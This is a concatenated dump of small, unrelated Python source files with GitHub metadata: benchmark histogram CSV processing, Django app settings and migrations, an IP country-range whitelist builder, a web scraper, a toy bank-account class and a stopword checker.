hist_per_rep[suffix][keys][rep][tt[0]] = [] for vm_id in range(1, memtier_vms + 1): for inst in range(1, memtier_instances_per_vm + 1): buckets = histograms[suffix][keys][rep][vm_id][inst][tt[1]] requests = histograms[suffix][keys][rep][vm_id][inst][tt[0]] if tt[1] not in hist_per_rep[suffix][keys][rep]: hist_per_rep[suffix][keys][rep][tt[1]] = buckets for k in range(len(requests)): if k >= len(hist_per_rep[suffix][keys][rep][tt[0]]): hist_per_rep[suffix][keys][rep][tt[0]].append(requests[k]) else: hist_per_rep[suffix][keys][rep][tt[0]][k] += requests[k] print_hists_per_rep(hist_per_rep) final_buckets = hist_per_rep[suffixes[0]][num_keys[2]][1][tt[1]] hist_final = {} for suffix in suffixes: hist_final[suffix] = {} for keys in num_keys: hist_final[suffix][keys] = {} hist_final[suffix][keys][metrics[0]] = [] #mean hist_final[suffix][keys][metrics[1]] = [] #std for z in range(len(final_buckets)): points = [hist_per_rep[suffix][keys][0][tt[0]][z], hist_per_rep[suffix][keys][1][tt[0]][z], hist_per_rep[suffix][keys][2][tt[0]][z]] hist_final[suffix][keys][metrics[0]].append(np.mean(np.asarray(points))) hist_final[suffix][keys][metrics[1]].append(np.std(np.asarray(points))) print_final_hists(hist_final, final_buckets) def print_final_hists(hist_final, final_buckets): header = ["#Buckets", "Mean jobs - Keys 1", "Std jobs - Keys 1", "Mean jobs - Keys 3", "Std jobs - Keys 3", "Mean jobs - Keys 6", "Std jobs - Keys 6", "Mean jobs - Keys 9", "Std jobs - Keys 9"] for suffix in suffixes: path = plots_base_name + "histograms_" + suffix + ".csv" with open(path, 'w') as csv_file: writer = csv.DictWriter(csv_file, fieldnames=header) writer.writeheader() for row in range(len(final_buckets)): one_row = {} i = 0 one_row[header[i]] = final_buckets[row] i += 1 for keys in num_keys: for metric in metrics: one_row[header[i]] = hist_final[suffix][keys][metric][row] i += 1 writer.writerow(one_row) csv_file.close() def print_hists_per_rep(hist_per_rep): header = ["#Buckets", "Keys 1 - rep 1", "Keys 1 - rep 2", "Keys 1 - rep 3", "Keys 3 - rep 1", "Keys 3 - rep 2", "Keys 3 - rep 3", "Keys 6 - rep 1", "Keys 6 - rep 2", "Keys 6 - rep 3", "Keys 9 - rep 1", "Keys 9 - rep 2", "Keys 9 - rep 3"] for suffix in suffixes: path = big_output_path_base_name + "histograms_" + suffix + ".csv" buckets = hist_per_rep[suffix][9][1][tt[1]] with open(path, 'w') as csv_file: writer = csv.DictWriter(csv_file, fieldnames=header) writer.writeheader() for row in range(len(buckets)): one_row = {} i = 0 one_row[header[i]] = buckets[row] i += 1 for keys in num_keys: for rep in range(repetitions): one_row[header[i]] = hist_per_rep[suffix][keys][rep][tt[0]][row] i += 1 writer.writerow(one_row) csv_file.close() def process_final(full_data): final_data = {} for suffix in suffixes: final_data[suffix] = {} for keys in num_keys: final_data[suffix][keys] = {} for title in titles: final_data[suffix][keys][title] = {} l1 = [] for rep in range(repetitions): l1.append(full_data[suffix][keys][rep][title]) final_data[suffix][keys][title][metrics[0]] = np.mean(np.asarray(l1)) final_data[suffix][keys][title][metrics[1]] = np.std(np.asarray(l1)) return final_data def print_final_data(index, final_data): header = ["#Keys", "Mean Response Time [ms]", "Std Response Time", "Mean 25th percentile [ms]", "Std 25th percentile", "Mean 50th percentile [ms]", "Std 50th percentile", "Mean 75th percentile [ms]", "Std 75th percentile", "Mean 90th percentile [ms]", "Std 90th percentile", "Mean 99th percentile [ms]", "Std 99th percentile"] path = plots_base_name + "response_time_and_percentiles_" + suffixes[index] + ".csv" with open(path, 'w') as csv_file: writer = csv.DictWriter(csv_file, fieldnames=header) writer.writeheader() for row in range(len(num_keys)): one_row = {} i = 0 one_row[header[i]] = num_keys[row] i += 1 for title in titles: for metric in metrics: one_row[header[i]] = final_data[suffixes[index]][num_keys[row]][title][metric] i += 1 writer.writerow(one_row) csv_file.close() def print_csv_all_reps(index, full_data): header = ["#Keys"] for title in titles: for rep in range(repetitions): current_rep = rep + 1 header.append(title + "_rep" + str(current_rep)) path = big_output_path_base_name + "all_" + suffixes[index] + ".csv" with open(path, 'w') as csv_file: writer = csv.DictWriter(csv_file, fieldnames=header) writer.writeheader() for row in range(len(num_keys)): one_row = {} i = 0 one_row[header[i]] = num_keys[row] i += 1 for title in titles: for rep in range(repetitions): one_row[header[i]] = full_data[suffixes[index]][num_keys[row]][rep][title] i += 1 writer.writerow(one_row) csv_file.close() def main(): read_jsons() make_histograms() # full_data = process_response_time_and_percentiles() # final_data = process_final(full_data) # for index in range(len(suffixes)): # print_csv_all_reps(index, full_data) # print_final_data(index, final_data) if __name__ == "__main__": main()
[ "jovan.nikolic@gess.ethz.ch" ]
jovan.nikolic@gess.ethz.ch
09433901cd398eb1b68a2c4107da479d5327b795
6e7393f57187089124ed0efb6b9235341e3fae17
/kh_django/khuser/apps.py
913a80460bc212293c3dbbe56fc11ba731ed14d4
[]
no_license
hunit612/django_shop
27b98b9fa6dac2f97b30a01b978ef0ebdbe9735e
e9e4178c87e1a4f70260174d272dc01b8918ae98
refs/heads/main
2023-03-13T07:00:42.425760
2021-03-01T14:40:54
2021-03-01T14:40:54
338,822,804
0
0
null
null
null
null
UTF-8
Python
false
false
118
py
from django.apps import AppConfig class KhuserConfig(AppConfig): name = 'khuser' verbose_name = '사용자'
[ "hunit612@gmail.com" ]
hunit612@gmail.com
b44a74768299645863484570c09d4de808d5b045
02d9e8e33ee9514c326effa65376b88c530f3049
/masatermica/settings.py
175960a7384b5c5deaade1c3269eb4b177587c93
[]
no_license
SolracNavi/my-first-blog
a974d286ecf5a17b031b794efb7bb78e4d27f614
2a2b910fe6219bc6cab5d159c2b3db20ed8d46fc
refs/heads/master
2020-06-24T22:00:15.817196
2019-08-01T02:11:28
2019-08-01T02:11:28
199,103,991
0
0
null
null
null
null
UTF-8
Python
false
false
3,214
py
""" Django settings for masatermica project. Generated by 'django-admin startproject' using Django 2.0.13. For more information on this file, see https://docs.djangoproject.com/en/2.0/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.0/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '-@qp7_de&y*v%@l&i+d0cdi5n3q5u=&pe%2kseg6c1v&6-$gff' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com'] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'blog', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'masatermica.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'masatermica.wsgi.application' # Database # https://docs.djangoproject.com/en/2.0/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.0/topics/i18n/ LANGUAGE_CODE = 'es-ar' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.0/howto/static-files/ STATIC_URL = '/static/' STATIC_ROOT = os.path.join(BASE_DIR, 'static') # a ver que hace
[ "el.sariri@gmail.com" ]
el.sariri@gmail.com
1d0d1a4ae639e6a74e1217e9b97c79cdbb3541a8
9a27bf7fbcddfed5770f876f14140e1bfa94942e
/country-ranges.py
a5644feceb490a049e0bce48c6b286b6048bfd95
[]
no_license
zb3/scan-ignore-utils
d71a4260b636b4ba4a59e3bd7f8461f37a13058e
66c95b974266416baedb812280b7b81476d09366
refs/heads/master
2021-05-12T14:17:11.123920
2019-12-20T17:27:11
2019-12-20T17:27:11
116,952,564
4
0
null
null
null
null
UTF-8
Python
false
false
1,701
py
import sys import csv import argparse from util import * """ * This tool always produces a whitelist, since the DB doesn't map every IP address to a country. So if you want to exclude ranges from one country, you will also need to exclude all unknown ranges, otherwise your exclusion may not be effective. """ parser = argparse.ArgumentParser() parser.add_argument('blocks_file', help='CSV file containing IP to country id mappings') parser.add_argument('locations_file', help='CSV file containing country id to country code mappings') parser.add_argument('CC', nargs='+', help='country code') parser.add_argument('-b', action='store_true', help='Negate the countries list.') parser.add_argument('-n', action='store_true', help="Don't use CIDR format for output") args = parser.parse_args() no_cidr = args.n blacklist_mode = args.b target_countries = [cc.lower() for cc in args.CC] countries = [] country_map = {} ranges = [] with open(args.locations_file, newline='', encoding='utf-8') as csvfile: dbreader = csv.reader(csvfile) next(dbreader) for row in dbreader: cc = row[4].lower() if cc: countries.append(cc) country_map[row[0]] = cc with open(args.blocks_file, newline='', encoding='utf-8') as csvfile: dbreader = csv.reader(csvfile) next(dbreader) for row in dbreader: block, cid = row[:2] cc = country_map.get(cid) if not cc: continue cc_there = cc in target_countries if blacklist_mode != cc_there: ranges.append(ip_range(block)) ranges = merge_ranges(ranges) total = ranges_total(ranges) for line in output_ranges(ranges, no_cidr): print(line) print('%d addresses in output ranges' % total, file=sys.stderr)
[ "onlylogout@gmail.com" ]
onlylogout@gmail.com
f61fc5f91aad394d7fb0cff01fbb7842ed9c45b2
c7f8eb0bf36992599a3b81166e8713a41b0ad6d8
/main.py
a82d742e449edbe3889351d79efb6820da72e388
[]
no_license
dcassiero/webscrapery
7317b339cfb590370095ddd72476190b328df7bf
e4859ce8e2315640c935adbd19f2d102dafbf692
refs/heads/master
2021-01-20T07:51:36.003878
2017-05-02T18:48:58
2017-05-02T18:48:58
90,053,821
0
0
null
null
null
null
UTF-8
Python
false
false
261
py
from bs4 import BeautifulSoup import requests params = [] r = requests.get("https://stage-services.icg360.org/cxcat/health", params=params) soup = BeautifulSoup(r.text, "html.parser") results = soup.findAll("label", {"class": "control-label"}) print(results)
[ "daniel.cassiero@gmail.com" ]
daniel.cassiero@gmail.com
05837a53261174503793bd262e4c53569fed61db
ddc32226df51aa1a5796fa9df74c3e92fd0ace42
/django_workflow/migrations/0009_auto_20180226_1444.py
db15b64e0b8c188ee4117df3155aa7dba90ebd3b
[ "BSD-3-Clause" ]
permissive
dani0805/django_workflow
fc2dbf086fecc946f0cae19bd81583e77724335d
4eb20fefa95c5d917628fc32b5479879d119a7e1
refs/heads/master
2021-07-06T13:20:31.560791
2019-10-15T13:41:10
2019-10-15T13:41:10
101,757,229
8
0
BSD-3-Clause
2021-06-10T20:49:54
2017-08-29T12:11:49
Python
UTF-8
Python
false
false
874
py
# Generated by Django 2.0 on 2018-02-26 14:44 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('django_workflow', '0008_auto_20180117_1455'), ] operations = [ migrations.AddField( model_name='transitionlog', name='object_state', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='django_workflow.CurrentObjectState', verbose_name='Object State'), ), migrations.AlterField( model_name='transition', name='initial_state', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='outgoing_transitions', to='django_workflow.State', verbose_name='Initial State'), ), ]
[ "valerio.sanelli@florencetech.com" ]
valerio.sanelli@florencetech.com
ed14a31e2f83ec2a3f46f9db50e246d077f8693e
ee9b987b42140d7a4e4e8ecfbfab2b0629fefb4a
/user1.py
f364b5978c5b54ca55b6d9a0fb6c8b9fc3459882
[]
no_license
awalton9401/chicagocodepython
740d2ad2c9e63d606cb808ab13cc0a2017f772a8
f27c0336e60f0f4ec16fe12c9372caec7e2f403a
refs/heads/master
2021-01-15T06:17:30.149572
2020-02-25T03:35:56
2020-02-25T03:35:56
242,899,688
0
0
null
null
null
null
UTF-8
Python
false
false
1,208
py
class User: def __init__(self, name, email_address, account_balance): self.name = name self.email = email_address self.account_balance = account_balance def make_withdrawl(self, amount): self.account_balance -= amount def make_deposit(self, amount): self.account_balance += amount def display_user_balance(self): print(self.name, self.account_balance) def transfer_money(self,other_user,amount): self.account_balance -= amount other_user.account_balance += amount # def __str__(self): # return f"{self.fname} {self.lname}" user1=User("Andre Walton", "awalton9401@hotmail.com", 500) user2=User("Amber Walton", "awalton9401@hotmail.com", 700) user3=User("Anita Redding", "awalton9401@hotmail.com", 800) user1.make_deposit(100) user1.make_deposit(100) user1.make_deposit(100) user1.make_withdrawl(200) user2.make_deposit(100) user2.make_deposit(100) user2.make_withdrawl(50) user2.transfer_money(user1,100) user3.make_deposit(100) user3.make_withdrawl(50) user3.make_withdrawl(50) user3.make_withdrawl(50) user1.display_user_balance() user2.display_user_balance() user3.display_user_balance()
[ "awalton9401@hotmail.com" ]
awalton9401@hotmail.com
6347debad11c0a6b40a7f94a3ab778d780943f36
24a88b7dd4d81763fd4212a42c4a73f4c35f8ffc
/apiREST/api/serializers.py
f92010912774eedc0733526c21deca79cd4e444b
[]
no_license
junkluis/leccionMVC
d001c122318dde065ffd9a88aaaad0b7b4533a05
c311e69f2ae6d102651f9f7e6fc1f9750fc9e4bc
refs/heads/master
2021-01-15T19:27:48.875724
2017-08-14T14:35:29
2017-08-14T14:35:29
99,823,220
0
0
null
null
null
null
UTF-8
Python
false
false
244
py
from rest_framework import serializers from .models import * class ticketSerializer(serializers.ModelSerializer): class Meta: model = ticket fields = ('fechaEmision', 'Precio', 'Adquiriente', 'Puesto', 'Origen', 'Destino')
[ "lufezuro@gmail.com" ]
lufezuro@gmail.com
adf34bdb17df662959d03197aa497d4f9a4eccc1
9bbf429d2c2e2f20345d613a719cf01e8f9a0bff
/project/settings.py
6c1e92b7cc86c64ef10a85cf6336b520a2f2d545
[]
no_license
sandglasscao/ENU
f78f8a8dfaf3263587885b0622ab6d3182012375
e3c26fd57f8ef582da576e1cc28b7eb42562c706
refs/heads/master
2021-01-23T05:19:03.175439
2017-04-14T09:24:22
2017-04-14T09:24:22
86,297,754
0
0
null
null
null
null
UTF-8
Python
false
false
7,673
py
""" Django settings for project project. Generated by 'django-admin startproject' using Django 1.8.2. For more information on this file, see https://docs.djangoproject.com/en/1.8/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.8/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os import socket import datetime BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) ON_PAAS = 'OPENSHIFT_REPO_DIR' in os.environ if ON_PAAS: SECRET_KEY = os.environ['OPENSHIFT_SECRET_TOKEN'] else: # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = ')_7av^!cy(wfx=k#3*7x+(=j^fzv+ot^1@sh9s9t=8$bu@r(z$' # SECURITY WARNING: don't run with debug turned on in production! # adjust to turn off when on Openshift, but allow an environment variable to override on PAAS DEBUG = not ON_PAAS DEBUG = DEBUG or os.getenv("debug", "false").lower() == "true" if ON_PAAS and DEBUG: print("*** Warning - Debug mode is on ***") ALLOWED_HOSTS = ['*'] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.sites', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'rest_framework', 'crispy_forms', 'userprofile', 'metadata', 'utility', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'django.middleware.security.SecurityMiddleware', 'django.middleware.locale.LocaleMiddleware', ) ROOT_URLCONF = 'project.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates'), ], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', 'django.template.context_processors.static', 'django.template.context_processors.i18n', ], }, }, ] WSGI_APPLICATION = 'project.wsgi.application' if ON_PAAS: # determine if we are on MySQL or POSTGRESQL if "OPENSHIFT_POSTGRESQL_DB_USERNAME" in os.environ: DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': os.environ['OPENSHIFT_APP_NAME'], 'USER': os.environ['OPENSHIFT_POSTGRESQL_DB_USERNAME'], 'PASSWORD': os.environ['OPENSHIFT_POSTGRESQL_DB_PASSWORD'], 'HOST': os.environ['OPENSHIFT_POSTGRESQL_DB_HOST'], 'PORT': os.environ['OPENSHIFT_POSTGRESQL_DB_PORT'], } } elif "OPENSHIFT_MYSQL_DB_USERNAME" in os.environ: DATABASES = { 'default': { 'ENGINE': 'django.db.backends.mysql', 'NAME': os.environ['OPENSHIFT_APP_NAME'], 'USER': os.environ['OPENSHIFT_MYSQL_DB_USERNAME'], 'PASSWORD': os.environ['OPENSHIFT_MYSQL_DB_PASSWORD'], 'HOST': os.environ['OPENSHIFT_MYSQL_DB_HOST'], 'PORT': os.environ['OPENSHIFT_MYSQL_DB_PORT'], } } else: ''' # stock django, local development. DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } DATABASES = { 'default': { 'ENGINE': 'django.db.backends.mysql', 'NAME': os.environ['OPENSHIFT_APP_NAME'], 'USER': os.environ['OPENSHIFT_MYSQL_DB_USERNAME'], 'PASSWORD': os.environ['OPENSHIFT_MYSQL_DB_PASSWORD'], 'HOST': os.environ['OPENSHIFT_MYSQL_DB_HOST'], 'PORT': os.environ['OPENSHIFT_MYSQL_DB_PORT'], } } ''' DATABASES = { 'default': { 'ENGINE': 'django.db.backends.mysql', 'NAME': os.environ['APP_NAME2'], 'USER': os.environ['MYSQL_DB_USERNAME'], 'PASSWORD': os.environ['MYSQL_DB_PASSWORD'], 'HOST': os.environ['MYSQL_DB_HOST'], 'PORT': os.environ['MYSQL_DB_PORT'], } } # Internationalization # https://docs.djangoproject.com/en/1.8/topics/i18n/ # LANGUAGE_CODE = 'en-us' LANGUAGE_CODE = 'zh-hans' # TIME_ZONE = 'America/Sao_Paulo' TIME_ZONE = 'Asia/Shanghai' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.6/howto/static-files/ STATIC_URL = '/static/' STATIC_ROOT = os.path.join(BASE_DIR, 'wsgi', 'static') # STATIC_ROOT is just for production env to collect all static resources STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ) STATICFILES_DIRS = ( # Put strings here, like "/home/html/static" or "C:/www/django/static". # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. os.path.join(BASE_DIR, "static"), ) if ON_PAAS: MEDIA_ROOT = os.path.join(os.environ.get('OPENSHIFT_DATA_DIR'), 'media') MEDIA_URL = '/static/media/' else: #MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), 'media') MEDIA_ROOT = os.path.join(BASE_DIR, 'static', 'media') MEDIA_URL = STATIC_URL + 'media/' CRISPY_TEMPLATE_PACK = 'bootstrap3' SITE_ID = 1 LOGIN_REDIRECT_URL = '/' AUTH_PROFILE_MODULE = 'userprofile.Profile' LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'verbose': { 'format': "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s", 'datefmt': "%d/%b/%Y %H:%M:%S" }, 'simple': { 'format': '%(levelname)s %(message)s' }, }, 'handlers': { # 'file': { # 'level': 'INFO', # 'class': 'logging.FileHandler', # 'filename': 'bluepage.log', # 'formatter': 'verbose' # }, 'console': { 'level': 'DEBUG', 'class': 'logging.StreamHandler', 'formatter': 'verbose', }, }, 'loggers': { 'django': { 'handlers': ['console'], 'propagate': True, 'level': 'ERROR', }, 'case': { 'handlers': ['console'], 'level': 'DEBUG', }, 'page': { 'handlers': ['console'], 'level': 'DEBUG', }, } } REST_FRAMEWORK = { # Use Django's standard `django.contrib.auth` permissions, # or allow read-only access for unauthenticated users. 'DEFAULT_AUTHENTICATION_CLASSES': ( 'rest_framework_jwt.authentication.JSONWebTokenAuthentication', 'rest_framework.authentication.TokenAuthentication', ), 'DEFAULT_PERMISSION_CLASSES': [ 'rest_framework.permissions.IsAuthenticated', ] } JWT_AUTH = { 'JWT_EXPIRATION_DELTA': datetime.timedelta(seconds=30000), }
[ "root@localhost" ]
root@localhost
7ee2e91b98ce35a52abbece10be152d25ea89176
9884a461ad663e402074639f72005cc608a169ec
/ToDo/urls.py
c535801a83995ee58a2d982a9f44818624f16c56
[]
no_license
prshnt19/ToDo
1cd7de3be0957046aa72719bdf907768b617666c
dca6ea52ff4c67683beb5d4026772f79d2eae84d
refs/heads/master
2022-01-25T13:34:39.752599
2019-06-25T13:39:02
2019-06-25T13:39:02
174,274,805
0
1
null
2022-01-06T22:30:20
2019-03-07T05:01:27
HTML
UTF-8
Python
false
false
820
py
"""ToDo URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.1/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path from django.conf.urls import include urlpatterns = [ path('admin/', admin.site.urls), path('', include('home.urls')), ]
[ "prashant.rawat216@gmail.com" ]
prashant.rawat216@gmail.com
36f9d2123e175a1a9411491e0c6b6f2766b39207
76b79e9f97dccc120f0bd707ddc00ed749c7d519
/mainbasket_cekstopword.py
c39fd6a79eaec4ff06951fc3079df24e06b9e9db
[]
no_license
alhilmiu/file-web-mining
ece584d55976652c6f68b7343874ce9b9a60977c
46abbe8083bbf6021ddc3bcc7745d47ea7fe5008
refs/heads/master
2020-05-18T19:03:36.966006
2019-05-02T15:00:45
2019-05-02T15:00:45
184,600,666
0
0
null
null
null
null
UTF-8
Python
false
false
216
py
def cek_kata(kata): doc=open("stopwords.txt","r") kumpulan_kata=doc.read() #print (kumpulan_kata) if kata not in kumpulan_kata: ketemu=True else: ketemu=False return ketemu
[ "alhilmi015@gmail.com" ]
alhilmi015@gmail.com